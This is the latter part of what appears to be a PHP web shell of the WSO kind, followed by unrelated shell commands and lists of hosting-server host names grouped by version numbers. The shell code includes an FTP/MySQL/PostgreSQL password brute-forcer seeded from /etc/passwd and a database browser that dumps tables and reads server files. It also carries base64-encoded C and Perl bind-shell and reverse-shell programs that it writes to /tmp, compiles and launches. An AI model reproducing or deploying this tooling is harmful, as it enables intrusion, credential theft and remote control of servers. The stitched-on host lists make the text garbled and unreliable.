$_POST['proto'] == 'ftp' ) { function bruteForce($ip,$port,$login,$pass) { $fp = @ftp_connect($ip, $port?$port:21); if(!$fp) return false; $res = @ftp_login($fp, $login, $pass); @ftp_close($fp); return $res; } } elseif( $_POST['proto'] == 'mysql' ) { function bruteForce($ip,$port,$login,$pass) { $res = @mysql_connect($ip.':'.($port?$port:3306), $login, $pass); @mysql_close($res); return $res; } } elseif( $_POST['proto'] == 'pgsql' ) { function bruteForce($ip,$port,$login,$pass) { $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=postgres"; $res = @pg_connect($str); @pg_close($res); return $res; } } $success = 0; $attempts = 0; $server = explode(":", $_POST['server']); if($_POST['type'] == 1) { $temp = @file('/etc/passwd'); if( is_array($temp) ) foreach($temp as $line) { $line = explode(":", $line); ++$attempts; if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) { $success++; echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>'; } if(@$_POST['reverse']) { $tmp = ""; for($i=strlen($line[0])-1; $i>=0; --$i) $tmp .= $line[0][$i]; ++$attempts; if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) { $success++; echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp); } } } } elseif($_POST['type'] == 2) { $temp = @file($_POST['dict']); if( is_array($temp) ) foreach($temp as $line) { $line = trim($line); ++$attempts; if( bruteForce($server[0],@$server[1], $_POST['login'], $line) ) { $success++; echo '<b>'.htmlspecialchars($_POST['login']).'</b>:'.htmlspecialchars($line).'<br>'; } } } echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>"; } echo '<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>' .'<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>' .'<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">' .'<input type=hidden name=a value="'.htmlspecialchars($_POST['a']).'">' .'<input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).'">' .'<input type=hidden name=ne value="">' .'<span>Server:port</span></td>' .'<td><input type=text name=server value="127.0.0.1"></td></tr>' .'<tr><td><span>Brute type</span></td>' .'<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>' .'<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>' .'<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>' .'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>' .'<td><input type=text name=login value="root"></td></tr>' .'<tr><td><span>Dictionary</span></td>' .'<td><input type=text name=dict value="'.htmlspecialchars($GLOBALS['cwd']).'passwd.dic"></td></tr></table>' .'</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>'; echo '</div><br>'; hardFooter(); } function actionSql() { class DbClass { var $type; var $link; var $res; function DbClass($type) { $this->type = $type; } function connect($host, $user, $pass, $dbname){ switch($this->type) { case 'mysql': if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true; break; case 'pgsql': $host = explode(':', $host); if(!$host[1]) $host[1]=5432; if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true; break; } return false; } function selectdb($db) { switch($this->type) { case 'mysql': if (@mysql_select_db($db))return true; break; } return false; } function query($str) { switch($this->type) { case 'mysql': return $this->res = @mysql_query($str); break; case 'pgsql': return $this->res = @pg_query($this->link,$str); break; } return false; } function fetch() { $res = func_num_args()?func_get_arg(0):$this->res; switch($this->type) { case 'mysql': return @mysql_fetch_assoc($res); break; case 'pgsql': return @pg_fetch_assoc($res); break; } return false; } function listDbs() { switch($this->type) { case 'mysql': return $this->query("SHOW databases"); break; case 'pgsql': return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'"); break; } return false; } function listTables() { switch($this->type) { case 'mysql': return $this->res = $this->query('SHOW TABLES'); break; case 'pgsql': return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'"); break; } return false; } function error() { switch($this->type) { case 'mysql': return @mysql_error(); break; case 'pgsql': return @pg_last_error(); break; } return false; } function setCharset($str) { switch($this->type) { case 'mysql': if(function_exists('mysql_set_charset')) return @mysql_set_charset($str, $this->link); else $this->query('SET CHARSET '.$str); break; case 'pgsql': return @pg_set_client_encoding($this->link, $str); break; } return false; } function loadFile($str) { switch($this->type) { case 'mysql': return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file")); break; case 'pgsql': $this->query("CREATE TABLE hard2(file text);COPY hard2 FROM '".addslashes($str)."';select file from hard2;"); $r=array(); while($i=$this->fetch()) $r[] = $i['file']; $this->query('drop table hard2'); return array('file'=>implode("\n",$r)); break; } return false; } function dump($table, $fp = false) { switch($this->type) { case 'mysql': $res = $this->query('SHOW CREATE TABLE `'.$table.'`'); $create = mysql_fetch_array($res); $sql = $create[1].";\n"; if($fp) fwrite($fp, $sql); else echo($sql); $this->query('SELECT * FROM `'.$table.'`'); $i = 0; $head = true; while($â = $this->fetch()) { $sql = ''; if($i % 1000 == 0) { $head = true; $sql = ";\n\n"; } $columns = array(); foreach($â as $k=>$v) { if($v === null) $â[$k] = "NULL"; elseif(is_int($v)) $â[$k] = $v; else $â[$k] = "'".@mysql_real_escape_string($v)."'"; $columns[] = "`".$k."`"; } if($head) { $sql .= 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).") VALUES \n\t(".implode(", ", $â).')'; $head = false; } else $sql .= "\n\t,(".implode(", ", $â).')'; if($fp) fwrite($fp, $sql); else echo($sql); $i++; } if(!$head) if($fp) fwrite($fp, ";\n\n"); else echo(";\n\n"); break; case 'pgsql': $this->query('SELECT * FROM '.$table); while($â = $this->fetch()) { $columns = array(); foreach($â as $k=>$v) { $â[$k] = "'".addslashes($v)."'"; $columns[] = $k; } $sql = 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $â).');'."\n"; if($fp) fwrite($fp, $sql); else echo($sql); } break; } return false; } }; $db = new DbClass($_POST['type']); if((@$_POST['p2']=='download') && (@$_POST['p1']!='select')) { $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']); $db->selectdb($_POST['sql_base']); switch($_POST['charset']) { case "Windows-1251": $db->setCharset('cp1251'); break; case "UTF-8": $db->setCharset('utf8'); break; case "KOI8-R": $db->setCharset('koi8r'); break; case "KOI8-U": $db->setCharset('koi8u'); break; case "cp866": $db->setCharset('cp866'); break; } if(empty($_POST['file'])) { ob_start("ob_gzhandler", 4096); header("Content-Disposition: attachment; filename=dump.sql"); header("Content-Type: text/plain"); foreach($_POST['tbl'] as $v) $db->dump($v); exit; } elseif($fp = @fopen($_POST['file'], 'w')) { foreach($_POST['tbl'] as $v) $db->dump($v, $fp); fclose($fp); unset($_POST['p2']); } else die('<script>alert("Error! Can\'t open file");window.history.back(-1)</script>'); } hardHeader(); echo " <h1>Sql browser</h1><div class=content> <form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr> <td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr> <input type=hidden name=ne value=''><input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='". htmlspecialchars($GLOBALS['cwd']) ."'><input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'') ."'> <td><select name='type'><option value='mysql' "; if(@$_POST['type']=='mysql')echo 'selected'; echo ">MySql</option><option value='pgsql' "; if(@$_POST['type']=='pgsql')echo 'selected'; echo ">PostgreSql</option></select></td> <td><input type=text name=sql_host value=\"". (empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host'])) ."\"></td> <td><input type=text name=sql_login value=\"". (empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login'])) ."\"></td> <td><input type=text name=sql_pass value=\"". (empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass'])) ."\"></td><td>"; $tmp = "<input type=text name=sql_base value=''>"; if(isset($_POST['sql_host'])){ if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) { switch($_POST['charset']) { case "Windows-1251": $db->setCharset('cp1251'); break; case "UTF-8": $db->setCharset('utf8'); break; case "KOI8-R": $db->setCharset('koi8r'); break; case "KOI8-U": $db->setCharset('koi8u'); break; case "cp866": $db->setCharset('cp866'); break; } $db->listDbs(); echo "<select name=sql_base><option value=''></option>"; while($â = $db->fetch()) { list($key, $value) = each($â); echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>'; } echo '</select>'; } else echo $tmp; }else echo $tmp; echo "</td> <td><input type=submit value='>>' onclick='fs(d.sf);'></td> <td><input type=checkbox name=sql_count value='on'" . (empty($_POST['sql_count'])?'':' checked') . "> count the number of rows</td> </tr> </table> <script> s_db='".@addslashes($_POST['sql_base'])."'; function fs(f) { if(f.sql_base.value!=s_db) { f.onsubmit = function() {}; if(f.p1) f.p1.value=''; if(f.p2) f.p2.value=''; if(f.p3) f.p3.value=''; } } function st(t,l) { d.sf.p1.value = 'select'; d.sf.p2.value = t; if(l && d.sf.p3) d.sf.p3.value = l; d.sf.submit(); } function is() { for(i=0;i<d.sf.elements['tbl[]'].length;++i) d.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked; } </script>"; if(isset($db) && $db->link){ echo "<br/><table width=100% cellpadding=2 cellspacing=0>"; if(!empty($_POST['sql_base'])){ $db->selectdb($_POST['sql_base']); echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>"; $tbls_res = $db->listTables(); while($â = $db->fetch($tbls_res)) { list($key, $value) = each($â); if(!empty($_POST['sql_count'])) $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.'')); $value = htmlspecialchars($value); echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'> <a href=# onclick=\"st('".$value."',1)\">".$value."</a>" . (empty($_POST['sql_count'])?' ':" <small>({$n['n']})</small>") . "</nobr><br>"; } echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>"; if(@$_POST['p1'] == 'select') { $_POST['p1'] = 'query'; $_POST['p3'] = $_POST['p3']?$_POST['p3']:1; $db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']); $num = $db->fetch(); $pages = ceil($num['n'] / 30); echo "<script>d.sf.onsubmit=function(){st(\"" . $_POST['p2'] . "\", d.sf.p3.value)}</script><span>".$_POST['p2']."</span> ({$num['n']} records) Page # <input type=text name='p3' value=" . ((int)$_POST['p3']) . ">"; echo " of $pages"; if($_POST['p3'] > 1) echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']-1) . ")'>< Prev</a>"; if($_POST['p3'] < $pages) echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']+1) . ")'>Next ></a>"; $_POST['p3']--; if($_POST['type']=='pgsql') $_POST['p2'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30); else $_POST['p2'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30'; echo "<br><br>"; } if((@$_POST['p1'] == 'query') && !empty($_POST['p2'])) { $db->query(@$_POST['p2']); if($db->res !== false) { $title = false; echo '<table width=100% cellspacing=1 cellpadding=2 class=main>'; $line = 1; while($â = $db->fetch()) { if(!$title) { echo '<tr>'; foreach($â as $key => $value) echo '<th>'.$key.'</th>'; reset($â); $title=true; echo '</tr><tr>'; $line = 2; } echo '<tr class="l'.$line.'">'; $line = $line==1?2:1; foreach($â as $key => $value) { if($value == null) echo '<td><i>null</i></td>'; else echo '<td>'.nl2br(htmlspecialchars($value)).'</td>'; } echo '</tr>'; } echo '</table>'; } else { echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>'; } } echo "<br></form><form onsubmit='d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>"; if(!empty($_POST['p2']) && ($_POST['p1'] != 'loadfile')) echo htmlspecialchars($_POST['p2']); echo "</textarea><br/><input type=submit value='Execute'>"; echo "</td></tr>"; } echo "</table></form><br/>"; if($_POST['type']=='mysql') { $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'"); if($db->fetch()) echo "<form onsubmit='d.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='>>'></form>"; } if(@$_POST['p1'] == 'loadfile') { $file = $db->loadFile($_POST['p2']); echo '<br/><pre class=ml1>'.htmlspecialchars($file['file']).'</pre>'; } } else { echo htmlspecialchars($db->error()); } echo '</div>'; hardFooter(); } function actionNetwork() { hardHeader(); $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9"; $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; $bind_port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9"; $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="; echo "<h1>Network tools</h1><div class=content> <form name='nfp' onSubmit='g(null,null,this.using.value,this.port.value,this.pass.value);return false;'> <span>Bind port to /bin/sh</span><br/> Port: <input type='text' name='port' value='31337'> Password: <input type='text' name='pass' value='wso'> Using: <select name='using'><option value='bpc'>C</option><option value='bpp'>Perl</option></select> <input type=submit value='>>'> </form> <form name='nfp' onSubmit='g(null,null,this.using.value,this.server.value,this.port.value);return false;'> <span>Back-connect to</span><br/> Server: <input type='text' name='server' value=". $_SERVER['REMOTE_ADDR'] ."> Port: <input type='text' name='port' value='31337'> Using: <select name='using'><option value='bcc'>C</option><option value='bcp'>Perl</option></select> <input type=submit value='>>'> </form><br>"; if(isset($_POST['p1'])) { function cf($f,$t) { $w=@fopen($f,"w") or @function_exists('file_put_contents'); if($w) { @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t)); @fclose($w); } } if($_POST['p1'] == 'bpc') { cf("/tmp/bp.c",$bind_port_c); $â = ex("gcc -o /tmp/bp /tmp/bp.c"); @unlink("/tmp/bp.c"); $â .= ex("/tmp/bp ".$_POST['p2']." ".$_POST['p3']." &"); echo "<pre class=ml1>$â".ex("ps aux | grep bp")."</pre>"; } if($_POST['p1'] == 'bpp') { cf("/tmp/bp.pl",$bind_port_p); $â = ex(which("perl")." /tmp/bp.pl ".$_POST['p2']." &"); echo "<pre class=ml1>$â".ex("ps aux | grep bp.pl")."</pre>"; } if($_POST['p1'] == 'bcc') { cf("/tmp/bc.c",$back_connect_c); $â = ex("gcc -o /tmp/bc /tmp/bc.c"); @unlink("/tmp/bc.c"); $â .= ex("/tmp/bc ".$_POST['p2']." ".$_POST['p3']." &"); echo "<pre class=ml1>$â".ex("ps aux | grep bc")."</pre>"; } if($_POST['p1'] == 'bcp') { cf("/tmp/bc.pl",$back_connect_p); $â = ex(which("perl")." /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." &"); echo "<pre class=ml1>$â".ex("ps aux | grep bc.pl")."</pre>"; } } echo '</div>'; hardFooter(); } if( empty($_POST['a']) ) if(isset($â) && function_exists('action' . $â)) $_POST['a'] = $â; else $_POST['a'] = 'FilesMan'; if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) ) call_user_func('action' . $_POST['a']); ?>
Server check
vi diff.log vi `find -type f | grep -v diff.log`
cat compare_new.log | grep -v gif$ | grep -v jpg$ | grep -v png$
3.2.1
login-1.hoststar.ch *
login-1.loginserver.ch *
login-10.hoststar.at *
login-10.loginserver.ch *
login-11.hoststar.at *
login-12.hoststar.at *
login-13.hoststar.at *
login-2.hoststar.at *
login-2.hoststar.ch *
login-2.loginserver.ch *
login-3.hoststar.at *
login-3.loginserver.ch *
login-39.hoststar.ch *
login-4.hoststar.at *
login-4.loginserver.ch *
login-41.hoststar.ch *
login-42.hoststar.ch *
login-43.hoststar.ch *
login-44.hoststar.ch *
login-45.hoststar.ch *
login-46.hoststar.ch *
login-47.hoststar.ch *
login-48.hoststar.ch *
login-49.hoststar.ch *
login-5.hoststar.at *
login-5.loginserver.ch *
login-51.hoststar.ch *
login-52.hoststar.ch *
login-53.hoststar.ch *
login-55.hoststar.ch *
login-56.hoststar.ch *
login-57.hoststar.ch *
login-58.hoststar.ch *
login-59.hoststar.ch *
login-6.hoststar.at *
login-6.loginserver.ch *
login-61.hoststar.ch *
login-63.hoststar.ch *
login-64.hoststar.ch *
login-65.hoststar.ch *
login-67.hoststar.ch *
login-68.hoststar.ch *
login-69.hoststar.ch *
login-7.hoststar.at *
login-7.loginserver.ch *
login-71.hoststar.ch *
login-72.hoststar.ch *
login-73.hoststar.ch *
login-8.hoststar.at *
login-8.loginserver.ch *
login-9.hoststar.at *
login-9.loginserver.ch *
3.3.3
login-12.hoststar.ch *
login-13.hoststar.ch *
login-15.hoststar.ch *
login-16.hoststar.ch *
login-18.hoststar.ch *
login-19.hoststar.ch *
login-21.hoststar.ch *
login-22.hoststar.ch *
login-23.hoststar.ch *
login-24.hoststar.ch *
login-25.hoststar.ch *
login-26.hoststar.ch *
login-27.hoststar.ch *
login-28.hoststar.ch *
login-29.hoststar.ch *
login-3.hoststar.ch *
login-31.hoststar.ch *
login-32.hoststar.ch *
login-33.hoststar.ch *
login-34.hoststar.ch *
login-35.hoststar.ch *
login-36.hoststar.ch *
login-37.hoststar.ch *
login-38.hoststar.ch *
login-4.hoststar.ch *
login-54.hoststar.ch *
login-6.hoststar.ch *
login-62.hoststar.ch *
login-66.hoststar.ch *
login-7.hoststar.ch *
login-75.hoststar.ch *
login-76.hoststar.ch *
login-77.hoststar.ch *
login-78.hoststar.ch *
login-79.hoststar.ch *
login-8.hoststar.ch *
login-9.hoststar.ch *
tux27.hoststar.ch *
tux33.hoststar.ch *
tux9.hoststar.ch
3.3.4
login-74.hoststar.ch *
login-81.hoststar.ch *
login-82.hoststar.ch *
login-83.hoststar.ch *
login-84.hoststar.ch *
login-85.hoststar.ch *
login-86.hoststar.ch *
login-88.hoststar.ch *
3.3.5
login-1.hoststar.at *
login-102.hoststar.ch
login-103.hoststar.ch
login-104.hoststar.ch
login-105.hoststar.ch
login-106.hoststar.ch
login-107.hoststar.ch
login-108.hoststar.ch
login-109.hoststar.ch
login-11.loginserver.ch
login-111.hoststar.ch
login-112.hoststar.ch
login-113.hoststar.ch
login-114.hoststar.ch
login-115.hoststar.ch
login-116.hoststar.ch
login-117.hoststar.ch
login-118.hoststar.ch
login-119.hoststar.ch
login-121.hoststar.ch
login-122.hoststar.ch
login-123.hoststar.ch
login-124.hoststar.ch
login-125.hoststar.ch
login-126.hoststar.ch
login-127.hoststar.ch
login-128.hoststar.ch
login-129.hoststar.ch
login-13.loginserver.ch
login-131.hoststar.ch
login-133.hoststar.ch
login-134.hoststar.ch
login-135.hoststar.ch
login-136.hoststar.ch
login-137.hoststar.ch
login-138.hoststar.ch
login-139.hoststar.ch
login-14.loginserver.ch
login-141.hoststar.ch
login-142.hoststar.ch
login-143.hoststar.ch
login-144.hoststar.ch
login-145.hoststar.ch
login-146.hoststar.ch
login-147.hoststar.ch
login-148.hoststar.ch
login-149.hoststar.ch
login-15.hoststar.at
login-15.loginserver.ch
login-151.hoststar.ch
login-152.hoststar.ch
login-153.hoststar.ch
login-154.hoststar.ch
login-16.hoststar.at
login-16.loginserver.ch
login-17.hoststar.at
login-17.loginserver.ch
login-18.loginserver.ch
login-19.loginserver.ch
login-20.loginserver.ch
login-21.loginserver.ch
login-22.loginserver.ch
login-87.hoststar.ch
login-89.hoststar.ch
login-91.hoststar.ch
login-92.hoststar.ch
login-93.hoststar.ch
login-94.hoststar.ch
login-95.hoststar.ch
login-96.hoststar.ch
login-97.hoststar.ch
login-98.hoststar.ch
login-99.hoststar.ch